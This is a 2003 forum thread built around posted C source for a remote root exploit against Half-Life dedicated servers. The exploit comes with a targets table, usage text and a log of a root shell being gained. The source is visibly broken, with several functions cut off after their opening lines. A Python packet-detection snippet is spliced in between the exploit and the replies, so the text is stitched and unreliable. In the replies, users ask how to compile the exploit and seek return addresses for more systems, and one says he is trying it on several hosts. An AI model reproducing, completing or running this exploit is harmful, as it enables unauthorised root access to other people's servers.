hk-vig and wsxz (priv8security.com) published a high-risk confidential remote root exploit (if running as root) against Halflife <= 1.1.1.0 (including all mods like CS, DoD) and dedicated server 3.1.1.1c1/4.1.1.1a. Exploitation successfully tested on FreeBSD. This code is based upon the recent halflife exploit but it is not a DoS. Instead this exploit provides you a nice shell to the vulnerable host.
CODE
//
// PRIV8 SECURITY & UHAGr CONFIDENTIAL SOURCE - DO NOT DISTRIBUTE !!!
// Halflife <= 1.1.1.0 , 3.1.1.1c1 and 4.1.1.1a exploit
// Code by hkvig of UHAGr and wsxz of Priv8 Security
//
// This code is based upon the recent halflife exploit but it is
// not a dos. Instead this exploit provides you a nice shell to
// the vulnerable host
//
//
// LOGS OF SUCCESSFUL EXPLOITATION
//
// [wsxz@localhost xdcc]$ ./hl 0 192.168.0.4
//
//
// PRIV8 SECURITY & UHAGr CONFIDENTIAL EXPLOIT - DO NOT DISTRIBUTE !!!
// Halflife <= 1.1.1.0 , 3.1.1.1c1 and 4.1.1.1a exploit
// Code by hkvig of UHAGr and wsxz of Priv8 Security
// Greetings to #priv8security & #!uhagr people
//
// [+] Looking up host ip addr
// [+] Establishing virtual udp connection
// [+] Getting server info
// [+] Server protocol 0x2e
//     Players 0
//     Proxy 0
//     Lan 0
//     Nplayers 0x10
//     Directory cstrike
//     Description CounterStrike
//     Host Counter-Strike 1.5 Server
//     Type 0
//     Pass 0
//     Os 0
//     Security 0x1
// [+] Getting server challenge integer
//     Server challenge is 280135011
// [+] Exploiting halflife server
// [+] Connecting to our shell
// Linux freebsd.rlz 2.4.2 FreeBSD 5.1-RELEASE #0: Thu Jun 5 02:55:42 GMT 2003
// root@wv i386 unknown
// uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
//
//
// Greetings fly to
// - The rest UHAGr and Priv8 Security people
// - CCC
// - All of our friends to any net

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <linux/socket.h>
#include <linux/sockios.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>

// The structure that holds the server info needed for the exploitation
struct serverinfo
{
    unsigned int protocol;      // Protocol version
    unsigned int players;       // Current players
    unsigned int proxytarget;   // Proxy
    unsigned int lan;           // Lan
    unsigned int nplayers;      // Players
    char *directory;            // Current directory
    char *description;          // Server description
    char *host;                 // Hosts alias
    char *challenge;            // Challenge integer
    unsigned int type;          // Server type
    unsigned int pass;          // Server pass
    unsigned int os;            // Os
    unsigned int security;      // Security
} server;

// The structure that contains the targets
struct target
{
    unsigned int id;
    const char *description;
    unsigned long int retaddr;
} targets[] =
{
    { 0 , "Freebsd 5.1"            , 0xbfbfe398 } ,
    { 1 , "DoS attack to every OS" , 0x41414141 } ,
    { 2 , NULL                     , 0 }
};

// This function lists the available targets
void list( void )
{
    int loop = 0;

// This function is responsible for the proper error reporting and
// error code returning
void do_exit( const char *str , const char *file , unsigned int line )
{
    fprintf( stdout , "\n" );
    if( file != NULL && line != 0 )
        fprintf( stdout , "Error at %s at line %d\n" , file , line );

    if( str != NULL )
        perror( str );

    exit( -errno );
}

// A safer version of the standard strtok() function
char *strtokerr( char *str , const char *del )
{
    char *ptr;

    if(( ptr = strtok( str , del )) == NULL )
    {
        fprintf( stdout , "Error at %s at line %d\n" , __FILE__ , __LINE__ );
        fprintf( stdout , "strtokerr(): strtok(): No such token\n" );
        do_exit( NULL , NULL , 0 );
    }

    return ptr;
}

// This function is responsible for looking the ip addr of the target host
unsigned long int lookup_host( char *host )
{
    struct in_addr r_host;
    struct hostent *ip;

// This function establishes a virtual udp connection to the target
// host so that send() can be used instead of sendto()
int udp_connect( unsigned long int addr , unsigned int port )
{
    int fd;
    struct sockaddr_in host;
    struct in_addr n_addr = *(( struct in_addr *)&addr );

// This function gets the server info needed for the exploitation and checks
// if the host is vulnerable
int server_info( int fd )
{
    char infostr[] = "\xff\xff\xff\xffinfostring\n\0";
    char buffer[BUFFER_SIZE];
    char *ptr;
    int loop , bytes;

// This function is responsible for getting the server's challenge in order
// to be used later into the exploitation udp packet
int server_challenge( int fd )
{
    char challstr[] = "\xff\xff\xff\xffgetchallenge\n\0";
    char buffer[BUFFER_SIZE];

// This function is responsible for exploiting a bsd host
int do_bof_bsd( int fd , struct target targ , unsigned long int offset )
{
    char *exploit , *ptr;
    int len;

int main( int argc , char *argv[] )
{
    unsigned long int addr;
    long int offset;
    int fd , usrtarg , port;

    fprintf( stdout , " \n\n"
             "PRIV8 SECURITY & UHAGr CONFIDENTIAL EXPLOIT - DO NOT DISTRIBUTE !!! \n"
             "Halflife <= 1.1.1.0 , 3.1.1.1c1 and 4.1.1.1a exploit \n"
             "Code by hkvig of UHAGr and wsxz of Priv8 Security \n"
             "Greetings to #priv8security & #!uhagr people \n\n" );

    if( argc != 4 && argc != 5 )
    {
        fprintf( stdout , "Usage: %s <Target id> <Host> <Offset> [<Server port>]\n\n"
                 "Set offset to 0 if you don't like to use an offset\n\n" , argv[0] );
        list();
        return 0;
    }

    if( argc == 5 )
    {
        port = atoi( argv[4] );
        fprintf( stdout , "[+] Using port %d\n" , port );
    }
    else
        port = DEST_PORT;
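An added defensive example, not part of the original post or the exploit source: heuristic triage of Half-Life out-of-band UDP packets on the server side, using only what the thread shows (the four-0xff packet header, the infostring/getchallenge queries, and the 0xbfbfe398 and 0x41414141 target values). The length threshold, the filler-run length, the "connect" command word in the samples and the sample packets themselves are constructed assumptions.

```python
"""Heuristic triage of Half-Life (GoldSrc) out-of-band UDP packets."""
import re

OOB_HEADER = b"\xff\xff\xff\xff"  # prefix of every query the thread's exploit sends
# Query commands the thread's exploit sends before the overflow packet.
KNOWN_QUERIES = {b"infostring", b"getchallenge"}
MAX_SANE_LEN = 256  # assumed tuning value: legitimate queries are far shorter
FILLER_RUN = 64     # assumed tuning value: one byte repeated this often is suspect
# Raw bytes of the thread's target values: the FreeBSD 5.1 return address
# (little-endian) and the 0x41414141 "DoS attack to every OS" filler.
KNOWN_RETADDRS = [(0xBFBFE398).to_bytes(4, "little"), b"\x41\x41\x41\x41"]

def classify_oob_packet(payload: bytes) -> str:
    """Label one UDP payload; defensive triage only, no protocol emulation."""
    if not payload.startswith(OOB_HEADER):
        return "not-oob"
    body = payload[len(OOB_HEADER):]
    # The command word is the text up to the first newline or space.
    command = body.split(b"\n", 1)[0].split(b" ", 1)[0].rstrip(b"\x00")
    if len(payload) > MAX_SANE_LEN:
        return "oversized"
    if re.search(rb"(.)\1{%d,}" % (FILLER_RUN - 1), body, re.DOTALL):
        return "filler-run"
    if any(addr in body for addr in KNOWN_RETADDRS):
        return "known-retaddr"
    if command in KNOWN_QUERIES:
        return "query"
    return "unknown-command"

def triage(packets) -> dict:
    """Count labels over a capture; anything other than 'query' deserves a look."""
    counts = {}
    for pkt in packets:
        label = classify_oob_packet(pkt)
        counts[label] = counts.get(label, 0) + 1
    return counts

# Constructed sample packets (not captured traffic).
SAMPLE_PACKETS = [
    OOB_HEADER + b"infostring\n\x00",
    OOB_HEADER + b"getchallenge\n\x00",
    OOB_HEADER + b"connect " + b"A" * 300,             # oversized
    OOB_HEADER + b"connect " + b"A" * 100,             # filler run under the length cap
    OOB_HEADER + b"connect " + KNOWN_RETADDRS[0] * 8,  # return address repeated
    b"not an oob packet",
]

if __name__ == "__main__":
    print(triage(SAMPLE_PACKETS))
```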
Just realized it's in the file downloads section, compiled. Thanks for the code :)
fUSiON
Aug 28 2003, 02:49 AM
Is this working for RedHat 9.0 too? Sorry for this noob question..
How do I compile it? gcc /home/user/file ??
Thx
spoilt_jesus
Sep 4 2003, 01:33 AM
Dear fUSiON, this exploit only spawns a shell on FreeBSD 5.1 (you can DoS any OS), but you can add as many targets as you want ;] There is a newer version of this code that includes targets for most of the Linux distros. That's all, thnx
www.UHAGr.org
Yorn
Sep 5 2003, 06:57 AM
QUOTE
There is a newer version of this code that includes targets for most of the Linux distros.
Till there is one that spawns remote shell on XP or 2000 this exploit is basically dead in the water.
spoilt_jesus
Sep 5 2003, 01:59 PM
Dear Yorn, I think the code for Win is only for the HL client, not the server... Nevermind, I'm not sure. I only know the code that we coded.. cu
Yorn
Sep 7 2003, 10:00 AM
QUOTE (spoilt_jesus @ Sep 5 2003, 01:59 PM)
Dear Yorn, I think the code for Win is only for the HL client, not the server... Nevermind, I'm not sure. I only know the code that we coded.. cu
Looks like it does a buffer overflow, right? Maybe I'm looking at it wrong.
If only FreeBSD and *nix OSs are exploitable, that'd be kind of odd. Usually with these kinds of things you just need a different kind of payload to get an NT or 2000 machine to buckle and drop a shell.
Maybe I'm wrong though.
p3nGu1n
Sep 7 2003, 03:11 PM
This exploit won't work for me. The DoS doesn't do anything at all, and most of the time the number to gain cmd crashes the server. I get: Error at half-life.c at line 284 tcp_connect(): connect(): Connection refused
Does this mean that my server is secure? I even tried it on freebsd.
Divx_dude
Sep 7 2003, 03:26 PM
What's the meaning of this exploit?
azazel
Sep 9 2003, 05:09 AM
QUOTE (Divx_dude @ Sep 7 2003, 03:26 PM)
What's the meaning of this exploit?
Well, possibilities are endless once you successfully gain root on the box.. I haven't been able to get a shell yet.. but I'm working on several hosts..
btw.. if anyone knows the ret addresses for other Unix versions.. I'd really appreciate it..
Regards